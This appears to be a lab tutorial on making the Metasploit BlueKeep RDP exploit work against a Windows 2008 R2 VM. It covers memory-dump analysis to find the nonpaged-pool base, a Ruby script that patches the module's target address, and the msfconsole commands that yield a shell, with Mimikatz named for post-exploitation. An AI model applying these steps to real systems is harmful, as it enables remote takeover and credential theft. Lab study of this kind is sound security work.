First off, this post is for educational purposes: I used a controlled lab environment to test the BlueKeep Metasploit module. Ok, with the disclaimer out of the way: the Metasploit team released a BlueKeep (CVE-2019-0708) remote code execution module back in September last year. I finally got around to labbing it. The lab setup:
VMware Workstation / VirtualBox or ESXi
Kali Linux 2019 VM
Metasploitable3 VM (or vulnerable Windows 7 / Windows 2K8R2 VM).
RDP must be enabled on the target and allowed through any firewall (i.e. the RDP service is active and reachable from the attack VM).
For Win 2K8R2 you must set HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\fDisableCam = 0 (the default of 1 disables the audio-mapping channel, RDPSND, that the exploit relies on, so with the default value the module never reaches the vulnerable code).
For my lab I used ESXi 6.7 with Metasploitable3 (2K8R2).
Non Paged Pool:
You will need to find the memory address of the nonpaged pool yourself, because the current Metasploit module does not detect it: each target entry ships with a hard-coded default address that only works if your VM's kernel happened to lay out the pool at exactly that address. The exploit uses this address as the base for its heap groom, so a wrong value gives you a failed run or a blue screen instead of a shell.
1. Download the vmss2core tool.
2. Take a VM snapshot of the vulnerable host while it is powered on, so the snapshot includes the guest's memory.
3. Copy the .vmsn and .vmem files the snapshot generated off the datastore.
4. Run the tool, passing the files in this order (.vmsn first, then .vmem):
vmss2core-sb-8456865.exe -W "Metasploitable3-Snap1.vmsn" "Metasploitable3-Snap1.vmem"
After that you have a memory.dmp file.
To get the memory address of the NPP (nonpaged pool), download WinDbg from the Microsoft Store. Load memory.dmp in WinDbg and run the command !poolfind *. At the end of the output you will get a line like:
Searching nonpaged pool (fffffa8006c08000 : fffffa8184200000) for tag 0x2020202a (* )
The first address of that range is the start of the nonpaged pool (fffffa8006c08000); that is the value the module needs. Check it against the second address in the same line: the module's groom has to fit between the two, and an address that is not page aligned or not in the kernel half of the address space means you read the wrong line.
The next step is to change the address of the respective target in the file "modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb".
I edited the VMware 15.1 entry (which corresponds to target 5 in the Metasploit module).
What you are doing here is replacing the hard-coded NPP base address in that target's entry with the one you just read out of your own VM's memory dump, so the module's heap groom is aligned to your host rather than to whatever VM the module author measured.
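Reading the address off the WinDbg output and typing it into the module by hand is error-prone: the !poolfind output carries more than one address range, and a typo in a 16-digit kernel address costs you a blue screen. The following Ruby script does both steps, extracting the nonpaged-pool base from the WinDbg text and rewriting one target's entry in the module source. It is an added example, not code from the original post or from the Metasploit project. It assumes the module stores each target's pool base under the hash key 'GROOMBASE' as a hex integer literal (verify that against your copy of cve_2019_0708_bluekeep_rce.rb before trusting the regex); the WinDbg output and the module excerpt embedded below are constructed for the example, with placeholder addresses.

```ruby
# Added example (not from the original post or the Metasploit project).
# Step 1: extract the nonpaged-pool base from WinDbg's "!poolfind *" output.
# Step 2: write that base into one target's GROOMBASE in the BlueKeep module.
#
# Assumption: the module keeps each target's pool base as 'GROOMBASE' => 0x...
# inside that target's hash. Verify against your copy of
# modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb.

# Constructed WinDbg output in the shape of the real "!poolfind *" message.
# The first line also carries an address range (the large-pool table), which
# is why the parser keys on the "Searching nonpaged pool" line specifically
# instead of grabbing the first hex range it sees.
WINDBG_OUTPUT = <<~TXT
  Scanning large pool allocation table for tag 0x2020202a (*   ) (fffffa80033e5000 : fffffa8003435000)
  Searching nonpaged pool (fffffa8006c08000 : fffffa8184200000) for tag 0x2020202a (*   )
TXT

# Constructed excerpt in the shape of the module's target table; the
# addresses here are placeholders, not the module's real defaults.
MODULE_SRC = <<~RUBY
  [ 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)',   { 'GROOMBASE' => 0xfffffa8001000000 } ],
  [ 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)', { 'GROOMBASE' => 0xfffffa8002000000 } ],
RUBY

# Only the line WinDbg prints when it starts walking nonpaged pool carries
# the range we want.
NPP_RE = /Searching nonpaged pool \((?<start>\h{16}) : (?<stop>\h{16})\)/

# Returns [start, end] of nonpaged pool as integers, or raises.
def npp_range(windbg_text)
  m = NPP_RE.match(windbg_text)
  raise ArgumentError, 'no "Searching nonpaged pool" line in the WinDbg output' unless m
  [m[:start].hex, m[:stop].hex]
end

# Sanity checks before touching the module: a canonical x64 kernel address,
# page aligned, and in the 0xfffffa80_xxxxxxxx region where 6.1.7601 x64
# (the only build the module targets) places nonpaged pool.
def plausible_npp_base?(addr)
  addr >= 0xffff800000000000 && (addr & 0xfff).zero? && (addr >> 32) == 0xfffffa80
end

# Rewrites the GROOMBASE literal of the named target and returns the new
# source. Raises if the target is absent, so a typo in the name cannot
# silently leave the old default in place.
def set_groombase(src, target_name, new_base)
  pattern = /(\[\s*'#{Regexp.escape(target_name)}'\s*,\s*\{[^}]*'GROOMBASE'\s*=>\s*)0x\h+/
  raise ArgumentError, "target #{target_name.inspect} not found" unless src.match?(pattern)
  src.sub(pattern) { "#{Regexp.last_match(1)}0x#{format('%016x', new_base)}" }
end

# End-to-end: WinDbg text -> checked base -> patched module source.
def patch_target(module_src, windbg_text, target_name)
  base, _stop = npp_range(windbg_text)
  unless plausible_npp_base?(base)
    raise ArgumentError, format('0x%016x does not look like a Win7/2008 R2 x64 NPP base', base)
  end
  set_groombase(module_src, target_name, base)
end

if __FILE__ == $PROGRAM_NAME
  name = 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)'
  puts patch_target(MODULE_SRC, WINDBG_OUTPUT, name)
  # Against the real file (back it up first; path is the usual Kali location):
  #   path = '/usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb'
  #   File.write(path, patch_target(File.read(path), File.read('poolfind.txt'), name))
end
```

Save the WinDbg output to a text file, run the script against the module file as shown in the trailing comment, then restart msfconsole (or `reload`) so the edited target table is picked up. If you snapshot the VM again later, repeat the procedure: a reboot can move the pool base, and the old value will crash the host instead of giving you a session.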
Time to switch to your Kali attack VM, start msfconsole and run:
1. use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
2. set RHOSTS 10.0.0.1 (your target host's IP address)
3. set TARGET 5 (the target whose address you edited)
4. exploit
And you've just popped a shell using the BlueKeep RCE exploit. Post-exploitation is now possible (Mimikatz, ProcDump etc.).
To recap, this Metasploit module is very manual: it requires setting the correct memory address and a bit of trial and error to get the remote code execution working. I noticed that if the exploit was successful on my vulnerable host, subsequent runs would usually produce a blue screen crash. If you're running into issues, try setting the groom size: 'set GROOMSIZE 100' or 'set GROOMSIZE 50'.